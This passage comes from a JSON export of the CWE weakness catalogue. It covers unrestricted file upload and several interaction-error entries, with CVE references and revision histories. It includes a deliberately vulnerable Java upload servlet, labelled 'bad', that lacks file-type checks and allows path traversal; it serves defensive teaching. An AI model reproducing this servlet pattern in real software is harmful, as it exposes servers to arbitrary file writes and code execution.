servlet.","Example_Code":[{"attr":{"@_Nature":"good","@_Language":"HTML"},"xhtml:div":{"#text":"&lt;form action=\\"FileUploadServlet\\" method=\\"post\\" enctype=\\"multipart/form-data\\"&gt;Choose a file to upload:&lt;input type=\\"file\\" name=\\"filename\\"/&gt;&lt;br/&gt;&lt;input type=\\"submit\\" name=\\"submit\\" value=\\"Submit\\"/&gt;&lt;/form&gt;","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class FileUploadServlet extends HttpServlet {}","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {}","xhtml:br":["","",""],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"response.setContentType(\\"text/html\\");PrintWriter out = response.getWriter();String contentType = request.getContentType();// the starting position of the boundary headerint ind = contentType.indexOf(\\"boundary=\\");String boundary = contentType.substring(ind+9);String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value// verify that content type is multipart form dataif (contentType != null &amp;&amp; contentType.indexOf(\\"multipart/form-data\\") != -1) {}// output unsuccessful upload response HTML pageelse{...}","xhtml:br":["","","","","","","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"// extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf(\\"\\\\\\\\\\"), pLine.lastIndexOf(\\"\\\\\\"\\"));...// output the file to the local upload directorytry {} catch (IOException ex) {...}// output successful upload response HTML page","xhtml:br":["","","","","","","","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {} //end of for loopbw.close();","xhtml:br":["",""],"xhtml:div":{"#text":"if (line.indexOf(boundary) == -1) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"bw.write(line);bw.newLine();bw.flush();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}}}}}}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":["When submitted the Java servlet\'s doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory.","This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code.","Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use \\"../\\" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0901","Description":"Web-based mail product stores \\".shtml\\" attachments that could contain SSI","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0901"},{"Reference":"CVE-2002-1841","Description":"PHP upload does not restrict file types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1841"},{"Reference":"CVE-2005-1868","Description":"upload and execution of .php file","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1868"},{"Reference":"CVE-2005-1881","Description":"upload file with dangerous extension","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1881"},{"Reference":"CVE-2005-0254","Description":"program does not restrict file types","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0254"},{"Reference":"CVE-2004-2262","Description":"improper type checking of uploaded files","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2262"},{"Reference":"CVE-2006-4558","Description":"Double \\"php\\" extension leaves an active php extension in the generated filename.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4558"},{"Reference":"CVE-2006-6994","Description":"ASP program allows upload of .asp files by bypassing client-side checks","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6994"},{"Reference":"CVE-2005-3288","Description":"ASP file upload","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3288"},{"Reference":"CVE-2006-2428","Description":"ASP file upload","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2428"}]},"Functional_Areas":{"Functional_Area":"File Processing"},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unrestricted File Upload"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A3","Entry_Name":"Malicious File Execution","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-434"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-422"}},{"attr":{"@_External_Reference_ID":"REF-423"}},{"attr":{"@_External_Reference_ID":"REF-424"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;File Uploading&#34;, Page 1068"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-434"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":["This can have a chaining relationship with incomplete denylist / permissive allowlist errors when the product tries, but fails, to properly limit which types of files are allowed (CWE-183, CWE-184).","This can also overlap multiple interpretation errors for intermediaries, e.g. anti-virus products that do not remove or quarantine attachments with certain file extensions that can be processed by client systems."]},{"#text":"PHP applications are most targeted, but this likely applies to other languages that support file upload, as well as non-web technologies. ASP applications have also demonstrated this problem.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Importance":"Critical","Modification_Comment":"converted from Compound_Element to Weakness"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated References, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Unrestricted File Upload","attr":{"@_Date":"2010-02-16"}}}},"435":{"attr":{"@_ID":"435","@_Name":"Improper Interaction Between Multiple Correctly-Behaving Entities","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses.","Extended_Description":"When a system or process combines multiple independent components, this often produces new, emergent behaviors at the system level.  However, if the interactions between these components are not fully accounted for, some of the emergent behaviors can be incorrect or even insecure.","Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Interaction Error"},{"Term":"Emergent Fault"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":["Unexpected State","Varies by Context"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Interaction Errors"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-568"}}},"Notes":{"Note":{"#text":"The \\"Interaction Error\\" term, in CWE and elsewhere, is only intended to describe products that behave according to specification. When one or more of the products do not comply with specifications, then it is more likely to be API Abuse (CWE-227) or an interpretation conflict (CWE-436). This distinction can be blurred in real world scenarios, especially when \\"de facto\\" standards do not comply with specifications, or when there are no standards but there is widespread adoption. As a result, it can be difficult to distinguish these weaknesses during mapping and classification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Type"}],"Previous_Entry_Name":[{"#text":"Interaction Errors","attr":{"@_Date":"2008-04-11"}},{"#text":"Interaction Error","attr":{"@_Date":"2017-11-08"}},{"#text":"Improper Interaction Between Multiple Entities","attr":{"@_Date":"2018-03-27"}}]}},"436":{"attr":{"@_ID":"436","@_Name":"Interpretation Conflict","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B\'s state.","Extended_Description":"This is generally found in proxies, firewalls, anti-virus software, and other intermediary devices that monitor, allow, deny, or modify traffic based on how the client or server is expected to behave.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The paper \\"Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection\\" [REF-428] shows that OSes varied widely in how they manage unusual packets, which made it difficult or impossible for intrusion detection systems to properly detect certain attacker manipulations that took advantage of these OS differences."},{"Intro_Text":"Null characters have different interpretations in Perl and C, which have security consequences when Perl invokes C functions. Similar problems have been reported in ASP [REF-429] and PHP."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-1215","Description":"Bypass filters or poison web cache using requests with multiple Content-Length headers, a non-standard behavior.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1215"},{"Reference":"CVE-2002-0485","Description":"Anti-virus product allows bypass via Content-Type and Content-Disposition headers that are mixed case, which are still processed by some clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0485"},{"Reference":"CVE-2002-1978","Description":"FTP clients sending a command with \\"PASV\\" in the argument can cause firewalls to misinterpret the server\'s error as a valid response, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1978"},{"Reference":"CVE-2002-1979","Description":"FTP clients sending a command with \\"PASV\\" in the argument can cause firewalls to misinterpret the server\'s error as a valid response, allowing filter bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1979"},{"Reference":"CVE-2002-0637","Description":"Virus product bypass with spaces between MIME header fields and the \\":\\" separator, a non-standard message that is accepted by some clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0637"},{"Reference":"CVE-2002-1777","Description":"AV product detection bypass using inconsistency manipulation (file extension in MIME Content-Type vs. Content-Disposition field).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1777"},{"Reference":"CVE-2005-3310","Description":"CMS system allows uploads of files with GIF/JPG extensions, but if they contain HTML, Internet Explorer renders them as HTML instead of images.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3310"},{"Reference":"CVE-2005-4260","Description":"Interpretation conflict allows XSS via invalid \\"&lt;\\" when a \\"&gt;\\" is expected, which is treated as \\"&gt;\\" by many web browsers.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4260"},{"Reference":"CVE-2005-4080","Description":"Interpretation conflict (non-standard behavior) enables XSS because browser ignores invalid characters in the middle of tags.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4080"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Multiple Interpretation Error (MIE)"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":27,"Entry_Name":"HTTP Response Smuggling"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"273"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-427"}},{"attr":{"@_External_Reference_ID":"REF-428"}},{"attr":{"@_External_Reference_ID":"REF-429"}},{"attr":{"@_External_Reference_ID":"REF-430"}},{"attr":{"@_External_Reference_ID":"REF-431"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Multiple Interpretation Error (MIE)","attr":{"@_Date":"2008-04-11"}}}},"437":{"attr":{"@_ID":"437","@_Name":"Incomplete Model of Endpoint Features","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint\'s features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Unexpected State","Varies by Context"]}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"HTTP request smuggling is an attack against an intermediary such as a proxy. This attack works because the proxy expects the client to parse HTTP headers one way, but the client parses them differently."},{"Intro_Text":"Anti-virus products that reside on mail servers can suffer from this issue if they do not know how a mail client will handle a particular attachment. The product might treat an attachment type as safe, not knowing that the client\'s configuration treats it as executable."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Extra Unhandled Features"}},"Notes":{"Note":{"#text":"This can be related to interaction errors, although in some cases, one of the endpoints is not performing correctly according to specification.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Extra Unhandled Features","attr":{"@_Date":"2008-04-11"}}}},"439":{"attr":{"@_ID":"439","@_Name":"Behavioral Change in New Version or Environment","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A\'s behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"435","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Functional change"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1976","Description":"Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1976"},{"Reference":"CVE-2005-1711","Description":"Product uses defunct method from another product that does not return an error code and allows detection avoidance.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1711"},{"Reference":"CVE-2003-0411","Description":"chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype \\"text\\".","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0411"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"CHANGE Behavioral Change"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}],"Previous_Entry_Name":{"#text":"Behavioral Change","attr":{"@_Date":"2008-04-11"}}}},"440":{"attr":{"@_ID":"440","@_Name":"Expected Behavior Violation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A feature, API, or function does not perform according to its specification.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"684","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Quality Degradation","Varies by Context"]}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2003-0187","Description":"Program uses large timeouts on \\"undeserving\\" to compensate for inconsistency of support for linked lists.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0187"},{"Reference":"CVE-2003-0465","Description":"\\"strncpy\\" in Linux kernel acts different than libc on x86, leading to expected behavior difference - sort of a multiple interpretation error?","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0465"},{"Reference":"CVE-2005-3265","Description":"Buffer overflow in product stems the use of a third party library function that is expected to have internal protection against overflows, but doesn\'t.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3265"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Expected behavior violation"}},"Notes":{"Note":{"#text":"The behavior of an application that is not consistent with the expectations of the developer may lead to incorrect use of the software.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relevant_Properties, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated 